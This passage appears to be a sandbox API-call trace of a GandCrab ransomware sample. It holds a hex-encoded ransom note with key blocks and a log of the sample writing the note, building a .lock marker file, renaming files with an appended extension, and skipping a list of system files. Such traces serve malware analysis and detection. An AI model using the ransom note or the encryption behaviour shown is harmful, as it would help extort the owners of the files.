4\x6f\x20\x64\x65\x63\x72\x79\x70\x74\x20\x31\x20\x66\x69\x6c\x65\x20\x66\x6f\x72\x20\x66\x72\x65\x65\x2e\x20\x0d\x0a\x0d\x0a\x0d\x0a\x41\x54\x54\x45\x4e\x54\x49\x4f\x4e\x21\x0d\x0a\x0d\x0a\x49\x4e\x20\x4f\x52\x44\x45\x52\x20\x54\x4f\x20\x50\x52\x45\x56\x45\x4e\x54\x20\x44\x41\x54\x41\x20\x44\x41\x4d\x41\x47\x45\x3a\x0d\x0a\x0d\x0a\x2a\x20\x44\x4f\x20\x4e\x4f\x54\x20\x4d\x4f\x44\x49\x46\x59\x20\x45\x4e\x43\x52\x59\x50\x54\x45\x44\x20\x46\x49\x4c\x45\x53\x0d\x0a\x2a\x20\x44\x4f\x20\x4e\x4f\x54\x20\x43\x48\x41\x4e\x47\x45\x20\x44\x41\x54\x41\x20\x42\x45\x4c\x4f\x57\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x42\x45\x47\x49\x4e\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x4b\x45\x59\x2d\x2d\x2d\x0d\x0a\x6c\x41\x51\x41\x41\x42\x42\x6a\x58\x74\x68\x4a\x35\x51\x30\x77\x50\x44\x4f\x69\x52\x2f\x55\x55\x71\x42\x6a\x71\x4e\x47\x47\x52\x4d\x53\x45\x54\x66\x6e\x4b\x46\x4e\x2f\x77\x43\x30\x5a\x32\x79\x38\x75\x58\x4e\x4b\x2f\x63\x51\x52\x78\x51\x2b\x75\x78\x6a\x76\x48\x59\x6f\x52\x4e\x57\x4b\x4f\x77\x79\x70\x66\x53\x6e\x77\x69\x73\x61\x7a\x66\x6f\x32\x49\x75\x35\x76\x57\x57\x2b\x52\x43\x6b\x47\x47\x42\x31\x47\x6e\x65\x73\x51\x6b\x51\x77\x75\x54\x32\x41\x5a\x78\x56\x78\x35\x51\x59\x34\x69\x65\x2b\x6c\x65\x57\x2f\x4d\x5a\x41\x77\x47\x50\x70\x7a\x38\x2f\x37\x64\x5a\x77\x6f\x4c\x2b\x55\x71\x71\x4f\x77\x4d\x70\x54\x47\x33\x2b\x41\x6e\x76\x45\x51\x33\x4c\x4d\x6e\x49\x69\x51\x63\x70\x34\x48\x44\x66\x64\x33\x38\x4d\x50\x52\x43\x73\x52\x36\x67\x71\x63\x49\x48\x6f\x42\x70\x55\x4c\x77\x43\x33\x47\x6d\x37\x78\x7a\x74\x5a\x42\x69\x48\x47\x5a\x67\x5a\x56\x37\x4c\x6e\x61\x67\x51\x6b\x72\x4f\x41\x6c\x77\x54\x31\x36\x69\x70\x71\x4c\x31\x7a\x58\x54\x34\x6b\x4f\x79\x47\x45\x5a\x4c\x53\x6c\x71\x36\x48\x52\x57\x72\x52\x4a\x6b\x59\x53\x51\x35\x7a\x4c\x74\x50\x31\x54\x6b\x34\x68\x6d\x6d\x42\x51\x31\x66\x6f\x6a\x57\x46\x72\x63\x6f\x54\x34\x36\x78\x63\x76\x57\x2b\x33\x53\x33\x30\x6e\x56\x30\x46\x43\x51\x59\x64\x6a\x35\x68\x48\x66\x62\x50\x6c\x62\x4f\x52\x5a\x72\x69\x34\x6e\x2b\x65\x55\x43\x49\x6c\x46\x31\x74\x4b\x78\x62\x45\x69\x51\x74\x4a\x4e\x74\x66\x66\x74\x31\x76\x6b\x59\x31\x62\x6e\x78\x49\x64\x74\x45\x74\x57\x62\x49\x4e\x77\x6c\x75\x6e\x2f\x31\x39\x37\x67\x4f\x72\x72\x49\x58\x4a\x2b\x45\x70\x37\x61\x31\x73\x34\x68\x41\x54\x32\x6b\x45\x6b\x6d\x31\x48\x55\x4e\x39\x39\x46\x55\x4d\x7a\x2b\x49\x73\x51\x45\x4b\x35\x41\x44\x59\x6d\x35\x4a\x73\x42\x55\x61\x63\x59\x6c\x58\x52\x65\x77\x77\x78\x4e\x41\x55\x67\x6b\x77\x54\x51\x31\x69\x78\x57\x48\x63\x68\x36\x4c\x4e\x66\x6f\x46\x62\x78\x2f\x59\x30\x51\x67\x6c\x59\x47\x6c\x37\x36\x62\x4c\x67\x6c\x6a\x67\x6c\x50\x69\x61\x72\x2b\x46\x4d\x6d\x73\x4a\x6b\x48\x44\x78\x58\x46\x41\x64\x70\x56\x50\x4d\x4b\x54\x2b\x50\x70\x63\x6e\x32\x67\x31\x52\x65\x6f\x6d\x79\x5a\x73\x41\x77\x33\x30\x68\x4e\x4d\x79\x59\x43\x74\x79\x7a\x59\x56\x6d\x51\x7a\x4e\x56\x56\x77\x65\x76\x4d\x6b\x70\x71\x33\x44\x66\x76\x30\x76\x48\x65\x43\x6a\x58\x63\x30\x71\x67\x72\x38\x48\x53\x78\x6f\x57\x53\x6c\x56\x42\x7a\x55\x4c\x72\x47\x64\x77\x71\x7a\x61\x62\x59\x79\x6f\x72\x78\x32\x77\x62\x32\x6c\x50\x71\x6e\x43\x73\x4c\x2f\x59\x4f\x74\x63\x72\x69\x65\x50\x62\x77\x73\x57\x59\x46\x5a\x51\x47\x46\x63\x31\x4a\x6f\x71\x4a\x4a\x5a\x35\x4a\x74\x74\x4a\x35\x31\x45\x4c\x44\x52\x43\x4e\x4d\x44\x68\x74\x5a\x76\x42\x66\x61\x49\x7a\x65\x39\x54\x5a\x4c\x52\x61\x43\x42\x69\x30\x4d\x4a\x68\x54\x57\x30\x38\x74\x63\x66\x54\x6f\x62\x4a\x76\x4a\x30\x4d\x39\x34\x56\x62\x51\x44\x76\x2b\x4e\x51\x37\x6e\x6b\x78\x69\x35\x53\x33\x38\x67\x32\x46\x72\x4d\x38\x48\x75\x66\x71\x71\x49\x34\x5a\x67\x4c\x6f\x71\x43\x74\x45\x5a\x44\x67\x69\x62\x74\x42\x77\x51\x7a\x6d\x77\x30\x55\x2b\x64\x2f\x66\x69\x6d\x4d\x4e\x57\x66\x77\x4f\x55\x35\x65\x36\x77\x50\x4e\x6a\x50\x48\x5a\x6a\x73\x57\x38\x2f\x34\x48\x66\x30\x66\x67\x58\x41\x76\x42\x32\x2b\x67\x6b\x76\x52\x73\x75\x48\x53\x69\x75\x57\x53\x30\x5a\x78\x7a\x2f\x41\x42\x33\x4e\x69\x47\x4f\x64\x5a\x50\x64\x78\x72\x71\x4b\x71\x59\x49\x42\x4f\x6b\x4b\x35\x47\x48\x36\x6e\x39\x31\x51\x69\x74\x2f\x43\x66\x46\x66\x4e\x43\x68\x51\x59\x79\x73\x59\x48\x69\x45\x55\x31\x6d\x43\x4a\x2f\x46\x2f\x42\x6d\x65\x4a\x79\x37\x74\x41\x30\x55\x72\x62\x72\x6f\x4c\x53\x66\x45\x74\x7a\x53\x78\x63\x36\x4e\x73\x54\x48\x41\x65\x65\x6d\x48\x6e\x4e\x77\x38\x6d\x4c\x56\x41\x70\x52\x6e\x68\x50\x42\x36\x73\x36\x69\x5a\x66\x59\x6b\x62\x6f\x44\x4c\x45\x37\x64\x72\x56\x44\x6c\x52\x72\x66\x7a\x62\x6f\x63\x31\x56\x6e\x47\x76\x46\x66\x46\x42\x66\x2b\x5a\x37\x6b\x2b\x57\x55\x76\x6b\x6b\x68\x63\x41\x43\x5a\x69\x4b\x74\x6c\x50\x62\x70\x35\x34\x53\x2f\x73\x2b\x55\x73\x6d\x4e\x48\x6a\x55\x4e\x52\x36\x44\x78\x53\x49\x32\x31\x75\x61\x45\x50\x32\x4d\x30\x71\x75\x57\x53\x65\x46\x4a\x38\x77\x76\x61\x2b\x6e\x2f\x6c\x47\x35\x58\x75\x4c\x78\x4b\x4d\x59\x53\x44\x48\x4f\x61\x39\x79\x73\x34\x31\x48\x69\x51\x7a\x43\x33\x41\x33\x52\x67\x73\x2f\x78\x58\x4f\x74\x66\x4d\x31\x78\x6b\x56\x4d\x65\x6c\x5a\x78\x39\x64\x67\x6c\x6f\x66\x33\x34\x4a\x34\x47\x61\x6f\x45\x37\x53\x64\x34\x75\x41\x32\x6b\x79\x61\x4c\x76\x57\x62\x44\x43\x68\x55\x38\x5a\x46\x48\x48\x2b\x4c\x4f\x43\x66\x56\x41\x5a\x61\x48\x34\x55\x6e\x42\x65\x48\x63\x37\x68\x70\x36\x43\x53\x6a\x30\x4b\x77\x73\x31\x68\x30\x31\x46\x63\x58\x67\x74\x76\x6a\x43\x6e\x41\x70\x6a\x55\x37\x46\x72\x59\x53\x42\x43\x72\x77\x7a\x53\x73\x58\x4f\x55\x6b\x36\x41\x43\x34\x37\x41\x69\x56\x69\x48\x2f\x71\x45\x66\x42\x34\x44\x73\x66\x33\x72\x4e\x59\x38\x4a\x44\x62\x51\x54\x44\x72\x73\x57\x7a\x49\x39\x6f\x62\x71\x4e\x53\x4f\x46\x65\x2f\x4a\x4f\x73\x64\x4e\x4e\x56\x6c\x78\x39\x67\x51\x31\x79\x57\x59\x38\x4e\x65\x33\x51\x33\x76\x71\x62\x32\x61\x4e\x67\x6c\x67\x35\x2b\x6d\x6e\x66\x72\x4f\x50\x62\x51\x4a\x33\x66\x36\x53\x48\x79\x52\x53\x63\x68\x6f\x44\x72\x4a\x66\x7a\x38\x43\x69\x78\x75\x39\x53\x6b\x39\x38\x44\x59\x57\x66\x6a\x6e\x73\x70\x75\x35\x59\x64\x2f\x50\x78\x47\x44\x32\x55\x4f\x62\x6b\x30\x62\x68\x65\x4d\x78\x68\x52\x69\x73\x42\x63\x39\x42\x63\x7a\x53\x4f\x4c\x2b\x36\x74\x6c\x65\x62\x68\x42\x6d\x54\x68\x38\x4c\x46\x61\x56\x6f\x6d\x4b\x31\x53\x38\x75\x7a\x74\x73\x68\x52\x56\x63\x4f\x4a\x68\x70\x37\x6f\x2b\x48\x56\x35\x64\x51\x54\x35\x77\x41\x4c\x53\x79\x4c\x36\x67\x4e\x52\x47\x6e\x4f\x6a\x35\x34\x58\x51\x36\x75\x35\x36\x48\x2f\x70\x6a\x63\x2b\x54\x4b\x6c\x59\x30\x61\x57\x52\x76\x38\x76\x65\x63\x59\x44\x52\x44\x48\x4c\x55\x6e\x45\x48\x41\x42\x4c\x46\x71\x4a\x50\x36\x58\x79\x64\x31\x48\x53\x57\x32\x36\x4b\x65\x74\x6a\x56\x37\x4b\x6e\x42\x49\x68\x39\x46\x5a\x68\x67\x6b\x61\x64\x68\x71\x4f\x57\x75\x55\x67\x66\x6f\x53\x6f\x62\x72\x32\x61\x4d\x37\x59\x4f\x6a\x67\x5a\x52\x68\x44\x69\x6e\x59\x62\x31\x73\x54\x49\x49\x77\x62\x6d\x63\x64\x6f\x55\x45\x45\x62\x6a\x4c\x50\x7a\x33\x35\x2f\x70\x44\x62\x33\x72\x4b\x2f\x6a\x65\x53\x62\x43\x61\x70\x43\x68\x33\x7a\x43\x66\x66\x48\x72\x31\x68\x39\x58\x59\x57\x4c\x37\x6f\x67\x6c\x4b\x31\x49\x79\x39\x53\x6e\x50\x7a\x72\x4e\x74\x77\x35\x69\x6e\x6e\x35\x67\x46\x2f\x54\x62\x32\x32\x2f\x64\x78\x34\x2b\x32\x53\x61\x55\x48\x50\x78\x54\x79\x70\x4f\x79\x6b\x62\x66\x6a\x72\x57\x7a\x4e\x79\x4e\x34\x74\x38\x54\x70\x4a\x6d\x6a\x64\x76\x6d\x31\x41\x6c\x38\x53\x54\x53\x51\x73\x76\x76\x52\x55\x37\x45\x43\x61\x52\x37\x6e\x4c\x32\x41\x64\x42\x4e\x36\x4a\x32\x6d\x35\x6a\x6d\x64\x78\x54\x5a\x79\x64\x77\x4a\x50\x6e\x36\x31\x63\x70\x46\x39\x6b\x71\x44\x77\x2f\x74\x76\x4c\x4f\x4c\x4a\x43\x43\x7a\x56\x32\x5a\x44\x48\x33\x4f\x49\x6d\x56\x75\x69\x6e\x67\x31\x6c\x31\x65\x62\x63\x65\x42\x53\x45\x6a\x6f\x36\x52\x61\x36\x7a\x67\x75\x31\x4d\x6a\x32\x63\x58\x39\x57\x4d\x77\x31\x50\x78\x30\x53\x64\x32\x6c\x4d\x75\x77\x6d\x51\x6b\x34\x30\x36\x4f\x49\x64\x4c\x64\x55\x64\x34\x67\x6c\x71\x66\x30\x55\x48\x72\x38\x64\x66\x47\x4a\x79\x66\x62\x61\x4a\x45\x4c\x63\x74\x56\x36\x67\x36\x2b\x6e\x35\x66\x44\x71\x36\x56\x51\x41\x30\x72\x78\x78\x74\x79\x76\x6b\x43\x74\x68\x6d\x52\x4c\x73\x54\x67\x66\x4f\x6f\x58\x65\x34\x47\x37\x68\x39\x69\x4e\x75\x65\x73\x6f\x4d\x72\x30\x50\x6f\x61\x38\x6b\x4a\x5a\x54\x56\x68\x66\x33\x77\x54\x2f\x75\x75\x79\x64\x4d\x79\x55\x70\x63\x6c\x53\x49\x6a\x71\x2b\x66\x55\x49\x52\x72\x2b\x37\x6b\x2f\x57\x39\x4f\x39\x56\x73\x79\x32\x4e\x63\x78\x35\x70\x66\x2b\x53\x2b\x4d\x72\x4c\x31\x41\x6d\x35\x52\x51\x69\x33\x63\x36\x78\x46\x65\x54\x78\x33\x4d\x63\x5a\x52\x38\x30\x6e\x56\x69\x6e\x68\x75\x59\x6c\x69\x52\x51\x68\x4b\x4e\x6f\x4e\x57\x49\x32\x67\x48\x61\x47\x36\x6c\x52\x75\x7a\x2b\x51\x68\x47\x30\x52\x70\x4d\x59\x62\x7a\x42\x67\x4f\x6a\x35\x68\x69\x2f\x63\x63\x79\x55\x79\x68\x4d\x35\x66\x55\x49\x67\x63\x4a\x31\x39\x6c\x50\x64\x63\x6d\x76\x69\x78\x47\x6c\x6b\x35\x52\x38\x72\x6b\x32\x5a\x66\x78\x68\x4a\x78\x72\x46\x49\x75\x4c\x51\x54\x73\x52\x72\x61\x69\x77\x63\x44\x4d\x54\x41\x6d\x39\x63\x38\x6b\x64\x72\x2f\x59\x66\x34\x51\x6e\x2b\x62\x76\x37\x79\x4a\x5a\x34\x59\x58\x67\x42\x38\x45\x64\x6c\x31\x58\x64\x53\x6e\x4d\x72\x55\x50\x56\x35\x6f\x72\x63\x42\x78\x33\x32\x65\x73\x48\x6c\x31\x62\x46\x48\x6b\x65\x73\x39\x5a\x39\x66\x77\x6a\x46\x46\x78\x35\x42\x2f\x43\x72\x79\x6e\x36\x49\x30\x62\x54\x68\x36\x53\x78\x71\x78\x53\x4d\x4b\x66\x61\x77\x6c\x59\x6a\x57\x52\x79\x70\x35\x79\x58\x74\x4e\x69\x62\x62\x2b\x63\x7a\x78\x54\x77\x67\x30\x35\x57\x45\x56\x69\x44\x6a\x32\x5a\x4d\x35\x56\x46\x45\x35\x67\x39\x6a\x56\x78\x31\x7a\x4c\x67\x4c\x36\x72\x45\x6f\x78\x76\x62\x50\x33\x2f\x6f\x57\x73\x72\x33\x72\x72\x35\x38\x63\x71\x62\x45\x36\x49\x49\x48\x34\x6b\x33\x74\x74\x34\x75\x37\x69\x71\x7a\x66\x55\x6b\x4a\x6d\x48\x2b\x38\x31\x76\x5a\x62\x56\x7a\x59\x48\x63\x36\x48\x51\x4c\x2f\x56\x4c\x6d\x74\x2b\x59\x37\x68\x52\x6b\x36\x79\x6f\x72\x53\x6a\x31\x70\x6d\x69\x50\x46\x72\x58\x4c\x39\x39\x57\x72\x62\x6c\x41\x59\x36\x4e\x71\x79\x68\x32\x6d\x78\x2f\x6a\x4b\x44\x58\x4d\x5a\x7a\x64\x6c\x55\x51\x32\x4d\x35\x67\x6a\x56\x6c\x38\x36\x6c\x4e\x43\x6f\x33\x37\x4c\x44\x4c\x56\x48\x55\x4a\x64\x38\x73\x75\x41\x37\x78\x48\x61\x76\x47\x4b\x4d\x42\x7a\x7a\x78\x38\x35\x70\x2b\x4a\x2f\x55\x56\x39\x57\x50\x58\x6e\x72\x75\x45\x41\x3d\x0d\x0a\x2d\x2d\x2d\x45\x4e\x44\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x4b\x45\x59\x2d\x2d\x2d\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x42\x45\x47\x49\x4e\x20\x50\x43\x20\x44\x41\x54\x41\x2d\x2d\x2d\x0d\x0a\x37\x66\x74\x44\x45\x67\x4c\x62\x2f\x5a\x53\x30\x6c\x63\x6d\x5a\x62\x48\x4d\x36\x31\x4b\x4c\x4a\x78\x51\x4f\x70\x44\x35\x34\x4b\x6b\x77\x36\x53\x62\x73\x73\x67\x66\x33\x59\x41\x57\x4f\x4d\x43\x79\x70\x2b\x4b\x59\x42\x78\x78\x47\x32\x44\x64\x39\x4d\x50\x4a\x45\x70\x44\x37\x41\x73\x6d\x56\x67\x4f\x43\x39\x52\x57\x66\x49\x52\x48\x51\x70\x51\x78\x47\x61\x31\x4c\x50\x47\x7a\x72\x45\x53\x47\x2b\x67\x67\x61\x72\x47\x58\x6f\x36\x62\x63\x47\x50\x4d\x70\x59\x30\x75\x48\x49\x6b\x6d\x67\x32\x38\x51\x55\x71\x68\x54\x73\x67\x6b\x67\x59\x58\x56\x70\x69\x44\x63\x46\x77\x69\x58\x48\x2f\x67\x6c\x4b\x56\x57\x6f\x56\x48\x4b\x43\x50\x5a\x4d\x70\x76\x37\x34\x43\x5a\x32\x4f\x38\x51\x33\x7a\x57\x61\x78\x30\x4b\x49\x52\x43\x2f\x6f\x76\x45\x74\x76\x42\x6d\x64\x6c\x53\x73\x70\x6d\x48\x4e\x76\x55\x46\x49\x4b\x6c\x30\x57\x59\x4e\x61\x41\x79\x77\x30\x53\x4b\x36\x62\x44\x4c\x6c\x46\x33\x79\x50\x71\x42\x35\x67\x6d\x61\x62\x46\x2b\x5a\x2f\x58\x4d\x47\x64\x33\x73\x67\x44\x37\x32\x35\x4a\x33\x2f\x55\x77\x42\x37\x77\x39\x78\x45\x57\x4c\x30\x79\x37\x34\x58\x71\x35\x33\x74\x48\x52\x6e\x4b\x53\x4d\x4a\x2b\x42\x6c\x31\x44\x7a\x65\x69\x71\x6f\x39\x46\x72\x64\x6e\x4d\x4b\x5a\x37\x31\x39\x47\x53\x56\x66\x4f\x2b\x54\x41\x69\x6d\x4c\x72\x37\x73\x34\x43\x75\x47\x41\x73\x70\x43\x61\x6a\x71\x52\x54\x77\x56\x66\x50\x66\x32\x30\x78\x42\x53\x55\x69\x44\x49\x74\x4c\x4f\x4a\x64\x4e\x41\x46\x42\x6e\x56\x71\x72\x4d\x5a\x6f\x52\x2b\x53\x33\x4e\x4c\x47\x59\x6d\x64\x61\x52\x33\x30\x66\x52\x50\x39\x33\x79\x71\x50\x4d\x77\x4c\x4f\x4c\x6a\x54\x36\x4f\x36\x72\x31\x78\x57\x34\x65\x5a\x78\x54\x7a\x50\x4a\x31\x66\x62\x44\x4c\x30\x39\x30\x30\x50\x66\x36\x53\x30\x61\x7a\x37\x4b\x41\x76\x6f\x54\x66\x46\x70\x35\x32\x47\x50\x44\x4b\x78\x35\x43\x68\x42\x75\x64\x72\x6f\x4d\x31\x6f\x4f\x36\x69\x71\x56\x77\x75\x6d\x32\x71\x42\x6c\x76\x5a\x4c\x77\x4b\x72\x74\x4d\x79\x70\x53\x38\x45\x31\x66\x6d\x6c\x58\x7a\x6d\x5a\x37\x71\x64\x34\x42\x75\x77\x75\x67\x57\x43\x77\x59\x30\x7a\x56\x62\x35\x51\x66\x76\x64\x78\x47\x4c\x53\x75\x6a\x37\x62\x69\x41\x77\x44\x50\x69\x71\x54\x4f\x4c\x4b\x50\x47\x67\x6a\x34\x32\x59\x57\x4b\x62\x2b\x2b\x41\x6c\x53\x76\x48\x75\x69\x7a\x34\x45\x59\x45\x71\x42\x45\x36\x69\x4e\x6e\x41\x4e\x66\x68\x77\x4e\x51\x4c\x49\x45\x7a\x31\x52\x6b\x48\x4b\x79\x62\x75\x4d\x4b\x70\x31\x52\x31\x6c\x51\x2f\x70\x75\x51\x65\x65\x7a\x77\x45\x69\x58\x54\x45\x43\x72\x37\x72\x0d\x0a\x2d\x2d\x2d\x45\x4e\x44\x20\x50\x43\x20\x44\x41\x54\x41\x2d\x2d\x2d") returned 4273 [0069.292] WriteFile (in: hFile=0x2cc, lpBuffer=0x2300000*, nNumberOfBytesToWrite=0x2162, lpNumberOfBytesWritten=0x259e824, lpOverlapped=0x0 | out: lpBuffer=0x2300000*, lpNumberOfBytesWritten=0x259e824*=0x2162, lpOverlapped=0x0) returned 1 [0069.293] CloseHandle (hObject=0x2cc) returned 1 [0069.293] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0069.294] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0069.294] GetSystemTime (in: lpSystemTime=0x25d0400 | out: lpSystemTime=0x25d0400*(wYear=0x7e3, wMonth=0x2, wDayOfWeek=0x1, wDay=0x12, wHour=0x11, wMinute=0x13, wSecond=0xe, wMilliseconds=0x267)) [0069.294] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0069.294] GetWindowsDirectoryW (in: lpBuffer=0x2630000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0069.294] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2630200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x2630600, lpMaximumComponentLength=0x2630608, lpFileSystemFlags=0x2630604, lpFileSystemNameBuffer=0x2630400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2630600*=0xd2ca4def, lpMaximumComponentLength=0x2630608*=0xff, lpFileSystemFlags=0x2630604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0069.294] wsprintfW (in: param_1=0x25d0000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\Collab\\d2ca4a09d2ca4deb61a.lock") returned 86 [0069.294] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\Collab\\d2ca4a09d2ca4deb61a.lock" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\adobe\\acrobat\\dc\\collab\\d2ca4a09d2ca4deb61a.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x2cc [0069.295] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0069.295] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0069.295] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\Collab\\") returned 62 [0069.295] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\Collab\\", lpString2="*" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\Collab\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\Collab\\*" [0069.295] FindFirstFileExW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\Collab\\*", fInfoLevelId=0x1, lpFindFileData=0x259e840, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x259e840) returned 0x503838 [0069.295] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0069.295] FindNextFileW (in: hFindFile=0x503838, lpFindFileData=0x259e840 | out: lpFindFileData=0x259e840) returned 1 [0069.296] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0069.296] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0069.296] FindNextFileW (in: hFindFile=0x503838, lpFindFileData=0x259e840 | out: lpFindFileData=0x259e840) returned 1 [0069.296] lstrcmpW (lpString1="d2ca4a09d2ca4deb61a.lock", lpString2=".") returned 1 [0069.296] lstrcmpW (lpString1="d2ca4a09d2ca4deb61a.lock", lpString2="..") returned 1 [0069.296] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\Collab\\", lpString2="d2ca4a09d2ca4deb61a.lock" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\Collab\\d2ca4a09d2ca4deb61a.lock") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\Collab\\d2ca4a09d2ca4deb61a.lock" [0069.296] lstrlenW (lpString=".titwmvjl") returned 9 [0069.296] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\Collab\\d2ca4a09d2ca4deb61a.lock") returned 86 [0069.296] VirtualAlloc (lpAddress=0x0, dwSize=0xec, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0069.296] wsprintfW (in: param_1=0x25d0000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\Collab\\d2ca4a09d2ca4deb61a.lock.titwmvjl") returned 95 [0069.296] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\Collab\\d2ca4a09d2ca4deb61a.lock") returned 86 [0069.296] lstrlenW (lpString=".lock") returned 5 [0069.296] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0069.297] wsprintfW (in: param_1=0x2630000, param_2="%ws " | out: param_1=".lock ") returned 6 [0069.297] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0069.297] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0069.297] FindNextFileW (in: hFindFile=0x503838, lpFindFileData=0x259e840 | out: lpFindFileData=0x259e840) returned 1 [0069.297] lstrcmpW (lpString1="TITWMVJL-DECRYPT.txt", lpString2=".") returned 1 [0069.297] lstrcmpW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="..") returned 1 [0069.297] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\Collab\\", lpString2="TITWMVJL-DECRYPT.txt" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\Collab\\TITWMVJL-DECRYPT.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\Collab\\TITWMVJL-DECRYPT.txt" [0069.297] lstrlenW (lpString=".titwmvjl") returned 9 [0069.297] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\Collab\\TITWMVJL-DECRYPT.txt") returned 82 [0069.297] VirtualAlloc (lpAddress=0x0, dwSize=0xe4, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0069.297] wsprintfW (in: param_1=0x25d0000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\Collab\\TITWMVJL-DECRYPT.txt.titwmvjl") returned 91 [0069.297] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\Collab\\TITWMVJL-DECRYPT.txt") returned 82 [0069.297] lstrlenW (lpString=".txt") returned 4 [0069.297] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0069.297] wsprintfW (in: param_1=0x2630000, param_2="%ws " | out: param_1=".txt ") returned 5 [0069.298] lstrcmpiW (lpString1=".txt", lpString2=".titwmvjl") returned 1 [0069.298] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0069.298] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\Collab\\TITWMVJL-DECRYPT.txt") returned 82 [0069.298] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\Collab\\TITWMVJL-DECRYPT.txt") returned 82 [0069.298] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="desktop.ini") returned 1 [0069.298] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="autorun.inf") returned 1 [0069.298] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="ntuser.dat") returned 1 [0069.298] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="iconcache.db") returned 1 [0069.298] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="bootsect.bak") returned 1 [0069.298] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="boot.ini") returned 1 [0069.298] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="ntuser.dat.log") returned 1 [0069.298] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="thumbs.db") returned 1 [0069.298] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0069.298] FindNextFileW (in: hFindFile=0x503838, lpFindFileData=0x259e840 | out: lpFindFileData=0x259e840) returned 0 [0069.298] FindClose (in: hFindFile=0x503838 | out: hFindFile=0x503838) returned 1 [0069.299] CloseHandle (hObject=0x2cc) returned 1 [0069.299] 